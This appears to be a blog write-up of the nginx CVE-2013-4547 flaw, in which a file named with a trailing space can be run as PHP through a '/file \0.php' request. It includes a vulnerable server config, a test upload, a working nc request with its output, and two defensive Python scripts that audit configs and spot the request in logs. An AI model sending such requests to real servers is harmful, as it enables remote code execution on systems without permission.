
Vulnerability in nginx - nginx security advisory (CVE-2013-4547)

A vulnerability has been discovered (and already fixed) in nginx.
Details here: mailman.nginx.org/pipermail/nginx-ru/2013-November/052575.html

nginx versions 0.8.41 through 1.5.6 are affected.
The problem is fixed in nginx 1.5.7 and 1.4.4.
A patch is available for custom builds: nginx.org/download/patch.2013.space.txt

This part of the advisory is especially interesting:

    "... as well as the ability to trigger special processing of a file whose name ends with a space, in a configuration of the form

    location ~ \.php$ {
        fastcgi_pass ...
    }

    by requesting the file as "/file \0.php"."


In the popular nginx + php setup, the vulnerability can be exploited as follows:
* The user uploads a file whose name ends with a space to the server.
* With a specially crafted request, that file is executed as PHP.

For nginx + php5-fpm, both of the following conditions must hold for the vulnerability to be exploitable:
1) fastcgi_param PATH_TRANSLATED must be of the form $document_root/$fastcgi_script_name, i.e. the script path is taken from the request;
2) in the fpm pool config, the security.limit_extensions value must allow any file (an empty value). By default it is set to .php .php3 .php4 .php5
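To make those two preconditions (plus the affected version range stated above) checkable, here is an added example audit script. It is not part of the original post or of nginx/php-fpm; the server block and the two pool snippets are constructed samples modelled on the advisory's example, the php-fpm socket path is a placeholder, and the parser is deliberately minimal (it reads only the text it is given and does not follow "include" files, which is an assumption about how it would be used).

```python
import re

# Constructed sample nginx server block, modelled on the advisory's example (not a real host's config).
VULNERABLE_NGINX_CONF = r"""
server {
    listen *:80;
    server_name example.com;
    root /var/www/hot;
    location ~ \.php$ {
        include /etc/nginx/fastcgi_params;
        fastcgi_param PATH_TRANSLATED $document_root/$fastcgi_script_name;
        fastcgi_param SCRIPT_FILENAME $document_root/$fastcgi_script_name;
        fastcgi_pass unix:/var/run/php5-fpm.sock;   # socket path is a constructed placeholder
    }
}
"""

# Constructed php-fpm pool snippets: the weak setting (empty list = any file) beside the corrected one.
WEAK_POOL_CONF = """
[www]
listen = /var/run/php5-fpm.sock
security.limit_extensions =
"""
SAFE_POOL_CONF = """
[www]
listen = /var/run/php5-fpm.sock
security.limit_extensions = .php
"""

# php-fpm default named in the advisory: only these extensions are executed when the key is absent.
FPM_DEFAULT_EXTENSIONS = (".php", ".php3", ".php4", ".php5")

# Condition 1: PATH_TRANSLATED / SCRIPT_FILENAME built from the request-controlled $fastcgi_script_name.
FASTCGI_PARAM_RE = re.compile(r"fastcgi_param\s+(PATH_TRANSLATED|SCRIPT_FILENAME)\s+(\S+)\s*;")

def nginx_script_path_from_request(nginx_conf: str) -> bool:
    return any("$fastcgi_script_name" in value
               for _name, value in FASTCGI_PARAM_RE.findall(nginx_conf))

def fpm_limit_extensions(pool_conf: str) -> tuple:
    """Effective security.limit_extensions list; an empty tuple means any file may be executed."""
    for raw in pool_conf.splitlines():
        line = raw.split(";", 1)[0].strip()          # drop ini-style comments
        if line.startswith("security.limit_extensions"):
            _key, _sep, value = line.partition("=")
            return tuple(value.split())
    return FPM_DEFAULT_EXTENSIONS                    # key absent: php-fpm default applies

def fpm_allows_any_file(pool_conf: str) -> bool:
    """Condition 2 from the advisory."""
    return fpm_limit_extensions(pool_conf) == ()

def _version(s: str) -> tuple:
    return tuple(int(p) for p in s.split("."))

def nginx_version_affected(version: str) -> bool:
    """Affected range from the advisory: 0.8.41 through 1.5.6, fixed in 1.4.4 and 1.5.7."""
    v = _version(version)
    if not (_version("0.8.41") <= v <= _version("1.5.6")):
        return False
    # the 1.4 stable branch was fixed in 1.4.4, so 1.4.4 and later 1.4.x releases are not affected
    if _version("1.4.4") <= v < _version("1.5.0"):
        return False
    return True

def exploitable(nginx_version: str, nginx_conf: str, pool_conf: str) -> bool:
    """True only when an unpatched version and both configuration conditions coincide."""
    return (nginx_version_affected(nginx_version)
            and nginx_script_path_from_request(nginx_conf)
            and fpm_allows_any_file(pool_conf))

if __name__ == "__main__":
    # "nginx/1.4.1" is the Server header shown in the advisory's transcript
    print("weak pool :", exploitable("1.4.1", VULNERABLE_NGINX_CONF, WEAK_POOL_CONF))   # True
    print("fixed pool:", exploitable("1.4.1", VULNERABLE_NGINX_CONF, SAFE_POOL_CONF))   # False
    print("patched   :", exploitable("1.4.4", VULNERABLE_NGINX_CONF, WEAK_POOL_CONF))   # False
```

The point the script makes is that either remedy breaks the chain on its own: upgrading nginx to 1.4.4 / 1.5.7 removes the parsing bug, while setting security.limit_extensions to .php (or leaving the php-fpm default in place) stops php-fpm from executing an uploaded "hole " file even on an unpatched server.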

Example of an exploitable configuration:

    server {
        listen *:80;
        server_name example.com;

        access_log ...;
        error_log ...;

        root /var/www/hot;

        location ~ \.php$ {
            include /etc/nginx/fastcgi_params;
            fastcgi_param PATH_TRANSLATED $document_root/$fastcgi_script_name;
            fastcgi_param SCRIPT_FILENAME $document_root/$fastcgi_script_name;
            fastcgi_pass pass;
        }

        location /css/ {}
        location /js/ {}
        location /img/ {}
    }




The uploaded file (note the trailing space in its name):

    cat "/var/www/hot/hole "
    <?php
    echo "I am hole";
    ?>




Finally, the request itself:

    echo -e "GET /hole \0.php HTTP/1.1\r\nHost: example.com\r\n\r\n" | nc -w 1 example.com 80
    HTTP/1.1 200 OK
    Server: nginx/1.4.1
    Date: Tue, 19 Nov 2013 15:31:51 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.19-1~dotdeb.1

    9
    I am hole
    0
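The request above has a recognisable shape (a path whose last segment ends in a space, then a NUL, then a script extension), so it can be picked out of access logs after the fact. The following detector is an added example, not code from the original post; the log lines are constructed samples in nginx's default "combined" format, and it assumes that nginx writes control characters inside $request as \xNN escapes (the detector also accepts a raw NUL byte and the percent-encoded %20/%00 forms, a conservative generalisation beyond the single request shown in the post).

```python
import re

# Constructed access-log lines (nginx "combined" format). The second line is modelled on the
# request in the advisory; the \x00 escape is an assumption about nginx's $request escaping.
SAMPLE_LOG = r'''
203.0.113.5 - - [19/Nov/2013:15:31:50 +0000] "GET /index.php HTTP/1.1" 200 612 "-" "curl/7.26.0"
203.0.113.5 - - [19/Nov/2013:15:31:51 +0000] "GET /hole \x00.php HTTP/1.1" 200 9 "-" "-"
203.0.113.9 - - [19/Nov/2013:15:32:02 +0000] "GET /img/logo.png HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
203.0.113.9 - - [19/Nov/2013:15:32:07 +0000] "GET /files/report%20final.pdf HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
'''.strip().splitlines()

# Pull the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>.*?) HTTP/[0-9.]+"')

# A space (raw or %20) immediately followed by a NUL (escaped \x00, raw byte, or %00) and an
# extension: the CVE-2013-4547 request shape. A plain encoded space in a path does not match.
NUL_AFTER_SPACE_RE = re.compile(r'(?: |%20)(?:\\x00|\x00|%00)\.[A-Za-z0-9]+')

def request_target(line: str):
    """Return the request target from a log line, or None if the line has no request field."""
    m = REQUEST_RE.search(line)
    return m.group("target") if m else None

def suspicious_request(line: str) -> bool:
    """True when the request target carries a space-then-NUL before a script extension."""
    target = request_target(line)
    return target is not None and NUL_AFTER_SPACE_RE.search(target) is not None

def find_suspicious(lines):
    """Filter an iterable of log lines down to the ones matching the CVE-2013-4547 shape."""
    return [line for line in lines if suspicious_request(line)]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print("suspicious:", hit)
```

Because the uploaded file is stored with the trailing space, the same pattern can be applied to the upload directory: any stored filename ending in a space is worth reviewing, and stripping trailing whitespace from uploaded names removes the precondition entirely.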


Source: https://habr.com/ru/post/202796/
